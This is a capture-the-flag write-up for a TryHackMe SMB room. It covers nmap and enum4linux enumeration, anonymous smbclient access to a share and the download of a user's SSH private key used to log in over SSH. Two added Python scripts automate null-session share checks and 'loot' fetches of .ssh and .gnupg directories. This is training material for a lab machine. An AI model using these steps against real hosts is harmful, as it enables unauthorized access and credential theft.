Network Services (SMB) - TryHackMe

Enumerating SMB

$ sudo nmap -Pn -A -sV 10.10.243.160
Nmap scan report for 10.10.243.160
Host is up (0.43s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
| 256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_ 256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Network Distance: 4 hops
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-22T03:00:48
|_ start_date: N/A
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: polosmb
| NetBIOS computer name: POLOSMB\x00
| Domain name: \x00
| FQDN: polosmb
|_ System time: 2022-02-22T03:00:48+00:00
1. Conduct an nmap scan of your choosing. How many ports are open?
3 (22, 139 and 445)
SMB is on 139/445 (139 is SMB over the NetBIOS session service, 445 is direct SMB)
Workgroup: WORKGROUP
Machine name: POLOSMB
OS version: 6.1 (smb-os-discovery reports "Windows 6.1"; that is the Windows version Samba 4.7.6 advertises, not the real OS, which Service Info shows as Linux)
# enum4linux -S 10.10.243.160
Sharename   Type   Comment
---------   ----   -------
netlogon    Disk   Network Logon Service
profiles    Disk   Users profiles
print$      Disk   Printer Drivers
IPC$        IPC    IPC Service (polosmb server (Samba, Ubuntu))
profiles (the "Users profiles" share is the one that will hold user home-directory data, so it is the share to open first)
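The enumeration above is done by eye. The following script is an added example, not part of the original write-up: it parses a saved nmap report (the sample is a constructed copy of the scan above, trimmed to the lines the parser uses) into the facts the questions ask for, flags the two security-relevant results in that scan (signing enabled but not required, guest session accepted), and builds the no-password smbclient checks to run against the shares enum4linux listed. SKIP_SHARES, the function names and the dataclass fields are this example's own choices.

```python
"""Added example: triage an nmap -A scan of an SMB host and queue the
null-session share checks. Not the write-up's own code."""
import re
from dataclasses import dataclass, field

# Constructed sample: the scan from the write-up above, trimmed.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
"""

# Constructed sample: the share names enum4linux -S returned above.
SAMPLE_SHARES = ["netlogon", "profiles", "print$", "IPC$"]

# Shares that never hold user data on a Samba host; skip them on the first pass.
SKIP_SHARES = {"IPC$", "print$", "ADMIN$", "C$"}

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)
WORKGROUP_RE = re.compile(r"\(workgroup: ([^)]+)\)")
NBNAME_RE = re.compile(r"NetBIOS name: ([^,]+),")
OS_RE = re.compile(r"OS: Windows ([\d.]+) \((Samba [^)]+)\)")


@dataclass
class SmbTarget:
    open_ports: list = field(default_factory=list)  # (port, service) pairs
    workgroup: str = ""
    netbios_name: str = ""
    os_version: str = ""       # the Windows version Samba advertises, e.g. "6.1"
    samba_version: str = ""
    signing_required: bool = False
    guest_session: bool = False

    @property
    def smb_ports(self):
        # 139 = SMB over NetBIOS session service, 445 = direct SMB
        return [p for p, svc in self.open_ports
                if svc in ("netbios-ssn", "microsoft-ds")]


def parse_scan(text):
    """Pull the enumeration facts out of nmap's normal (-oN) output."""
    t = SmbTarget()
    t.open_ports = [(int(p), s) for p, s in PORT_RE.findall(text)]
    m = WORKGROUP_RE.search(text)
    if m:
        t.workgroup = m.group(1)
    m = NBNAME_RE.search(text)
    if m:
        t.netbios_name = m.group(1)
    m = OS_RE.search(text)
    if m:
        t.os_version, t.samba_version = m.group(1), m.group(2)
    # smb2-security-mode prints "enabled and required" only when the server
    # enforces signing; "enabled but not required" (this host) means a relayed
    # NTLM authentication would be accepted.
    t.signing_required = "Message signing enabled and required" in text
    # smb-security-mode reports which account its own probe ended up as; "guest"
    # means the server mapped an unknown user to guest instead of refusing it.
    t.guest_session = "account_used: guest" in text
    return t


def findings(t):
    """Security-relevant observations worth carrying into the report."""
    out = []
    if t.smb_ports and not t.signing_required:
        out.append("SMB signing not required: host is a candidate for NTLM relay")
    if t.guest_session:
        out.append("guest/null session accepted: try anonymous share access")
    return out


def null_session_checks(host, shares):
    """One smbclient command per data share; -N sends no password at all."""
    return [f"smbclient -N //{host}/{s} -c ls"
            for s in shares if s not in SKIP_SHARES]


if __name__ == "__main__":
    target = parse_scan(SAMPLE_SCAN)
    print(f"open ports: {len(target.open_ports)}  smb: {target.smb_ports}")
    print(f"workgroup={target.workgroup} name={target.netbios_name} "
          f"os={target.os_version} ({target.samba_version})")
    for line in findings(target) + null_session_checks("10.10.243.160", SAMPLE_SHARES):
        print(line)
```

Feed it a real report with `nmap -Pn -A -sV -oN scan.txt <ip>` and `parse_scan(open("scan.txt").read())`; the generated smbclient lines are meant to be run by hand, since whether a share actually answers a null session is something only the target can tell you.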

Exploiting SMB

SMBClient

smbclient //[IP]/[SHARE] -U [user] -p [port]
(-U is optional; without it smbclient sends your local username. 445 is the default port, so -p 445 is only spelled out because the question asks for it.)
1. What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
smbclient //10.10.243.160/profiles -p 445
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \>
Pressing Enter at the password prompt (no -U, empty password) still opens a session, so the share allows anonymous access: Y. This is the same behaviour the scan's smb-security-mode script reported as account_used: guest.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> ls
. D 0 Tue Apr 21 07:08:23 2020
.. D 0 Tue Apr 21 06:49:56 2020
.cache DH 0 Tue Apr 21 07:08:23 2020
.profile H 807 Tue Apr 21 07:08:23 2020
.sudo_as_admin_successful H 0 Tue Apr 21 07:08:23 2020
.bash_logout H 220 Tue Apr 21 07:08:23 2020
.viminfo H 947 Tue Apr 21 07:08:23 2020
Working From Home Information.txt N 358 Tue Apr 21 07:08:23 2020
.ssh DH 0 Tue Apr 21 07:08:23 2020
.bashrc H 3771 Tue Apr 21 07:08:23 2020
.gnupg DH 0 Tue Apr 21 07:08:23 2020
12316808 blocks of size 1024. 7584024 blocks available
smb: \> more "Working From Home Information.txt"
The note answers the next three questions: it is from John Cactus, the service that has been set up for remote work is SSH, and so the .ssh directory in this profile is where the keys will be.
smb: \> cd .ssh
smb: \.ssh\> ls
. D 0 Tue Apr 21 07:08:23 2020
.. D 0 Tue Apr 21 07:08:23 2020
id_rsa A 1679 Tue Apr 21 07:08:23 2020
id_rsa.pub N 396 Tue Apr 21 07:08:23 2020
authorized_keys N 0 Tue Apr 21 07:08:23 2020
12316808 blocks of size 1024. 7584024 blocks available
smb: \> mget .ssh/id_rsa*
Get file id_rsa? yes
getting file \.ssh\id_rsa of size 1679 as .ssh/id_rsa (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
Get file id_rsa.pub? yes
getting file \.ssh\id_rsa.pub of size 396 as .ssh/id_rsa.pub (0.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
The transfer messages show the local names (as .ssh/id_rsa), so the key is written under .ssh/ in the directory smbclient was started from; if that was your home directory, it has just overwritten your own ~/.ssh/id_rsa, so start smbclient from a scratch directory or use lcd before mget. ssh refuses a private key that is group- or world-readable, hence the chmod. The account to log in as is cactus, matching the note's author:
chmod 600 .ssh/id_rsa
ssh -i .ssh/id_rsa cactus@10.10.243.160
cat smb.txt
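Spotting .ssh in the listing above was done by eye. The following script is an added example, not part of the original write-up: it parses an smbclient `ls` listing (the sample is a constructed copy of the listing above, laid out the way smbclient prints it), flags the entries that usually hold credentials or history in a home directory, and builds non-interactive smbclient fetch commands that `lcd` into a scratch directory first so nothing lands in your own ~/.ssh. The LOOT table, the /tmp/loot path and the function names are this example's own choices; the commands are built, not run.

```python
"""Added example: triage an smbclient directory listing and build fetch
commands for the interesting entries. Not the write-up's own code."""
import re
import shlex
from dataclasses import dataclass

# Constructed sample: the `ls` output from the write-up above.
SAMPLE_LISTING = """\
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt   N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

\t\t12316808 blocks of size 1024. 7584024 blocks available
"""

# name (may contain spaces), DOS attribute letters, size, then an asctime date.
LINE_RE = re.compile(
    r"^\s*(.+?)\s+([A-Z]+)\s+(\d+)\s+(\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4})\s*$")

# Names that usually hold credentials or history in a home directory.
LOOT = {
    ".ssh": "private keys / authorized_keys",
    ".gnupg": "PGP keys",
    ".bash_history": "command history",
    ".viminfo": "names of edited files and search history",
}


@dataclass
class Entry:
    name: str
    attrs: str   # D directory, H hidden, A archive, N normal, R read-only, S system
    size: int

    @property
    def is_dir(self):
        return "D" in self.attrs

    @property
    def hidden(self):
        # Hidden only affects how Windows clients display the entry; SMB still
        # serves it, which is why the dotfiles show up in the listing at all.
        return "H" in self.attrs


def parse_listing(text):
    """Turn smbclient ls output into Entry objects, skipping . and .."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) not in (".", ".."):
            entries.append(Entry(m.group(1), m.group(2), int(m.group(3))))
    return entries


def triage(entries):
    """(name, reason) pairs for entries worth pulling, in listing order."""
    hits = []
    for e in entries:
        if e.name in LOOT:
            hits.append((e.name, LOOT[e.name]))
        elif not e.is_dir and e.name.lower().endswith((".txt", ".conf", ".cfg", ".ini")):
            hits.append((e.name, "readable document or config"))
    return hits


def fetch_command(host, share, entry, outdir):
    """argv for a non-interactive smbclient fetch of one entry into outdir.
    `lcd` runs first so files never land in the current directory; directories
    need `recurse ON`, and `prompt OFF` suppresses the per-file y/n question."""
    ops = f"lcd {outdir}; "
    if entry.is_dir:
        ops += f'recurse ON; prompt OFF; mget "{entry.name}"'
    else:
        ops += f'get "{entry.name}"'
    return ["smbclient", "-N", f"//{host}/{share}", "-c", ops]


if __name__ == "__main__":
    entries = {e.name: e for e in parse_listing(SAMPLE_LISTING)}
    for name, reason in triage(entries.values()):
        print(f"# {name}: {reason}")
        print(shlex.join(fetch_command("10.10.243.160", "profiles", entries[name], "/tmp/loot")))
```

Run the printed commands with `mkdir -p /tmp/loot` done first; the private key then ends up at /tmp/loot/.ssh/id_rsa and the `chmod 600` and `ssh -i` steps above point there instead of at your own key.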
